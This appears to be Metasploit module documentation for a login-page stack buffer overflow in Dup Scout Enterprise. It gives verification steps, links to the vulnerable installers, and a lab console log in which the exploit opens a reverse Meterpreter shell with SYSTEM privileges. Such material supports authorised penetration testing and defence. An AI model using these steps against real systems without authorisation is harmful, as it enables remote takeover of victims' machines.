## Vulnerable Application

This module exploits a stack buffer overflow in Dup Scout Enterprise
versions <= 10.0.18. The overflow is triggered through the login page of
the application's built-in web interface. Successful exploitation yields
code execution as NT AUTHORITY\SYSTEM, since the web server runs under
that account.

This module has been tested successfully on Dup Scout Enterprise
versions:

* 9.9.14 on Windows 7 SP1 (x64)
* 9.9.14 on Windows XP SP0 (x64)
* 10.0.18 on Windows 7 SP1 (x64)
* 10.0.18 on Windows XP SP0 (x86)
* 10.0.18 on Windows 10 (1909) (x64)

## Verification Steps

Download:

* [Dup Scout Enterprise v9.9.14](https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe)
* [Dup Scout Enterprise v10.0.18](https://www.exploit-db.com/apps/84dcc5fe242ca235b67ad22215fce6a8-dupscoutent_setup_v10.0.18.exe)

Install the application from one of the links above and enable the web server by going to
Tools -> Advanced Options -> Server -> Enable Web Server on Port.

Metasploit:

1. Install the application and set the option above to enable the web server
1. Start msfconsole
1. Do: `use exploit/windows/http/dup_scout_enterprise_login_bof`
1. Do: `set rhosts <rhosts>`
1. Do: `run`
1. You should get a shell.

## Options

## Scenarios

### Dup Scout Enterprise version 10.0.18 (x86) on Windows 10 (1909) (x64)

```
msf6 > use exploit/windows/http/dup_scout_enterprise_login_bof 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set rhosts 172.16.191.199
rhosts => 172.16.191.199
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > set lhost 172.16.191.192 
lhost => 172.16.191.192
msf6 exploit(windows/http/dup_scout_enterprise_login_bof) > run

[*] Started reverse TCP handler on 172.16.191.192:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. Dup Scout Enterprise version 10.0.18.
[*] Selecting a target...
[*] Using target: Dup Scout Enterprise 10.0.18 (x86)
[*] Generating payload ...
[*] Sending payload (10000 bytes) ...
[*] Sending stage (175174 bytes) to 172.16.191.199
[*] Meterpreter session 1 opened (172.16.191.192:4444 -> 172.16.191.199:50196) at 2021-02-22 21:14:52 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-6VPIDIM
OS              : Windows 10 (10.0 Build 18363).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 17
Meterpreter     : x86/windows
meterpreter >
```

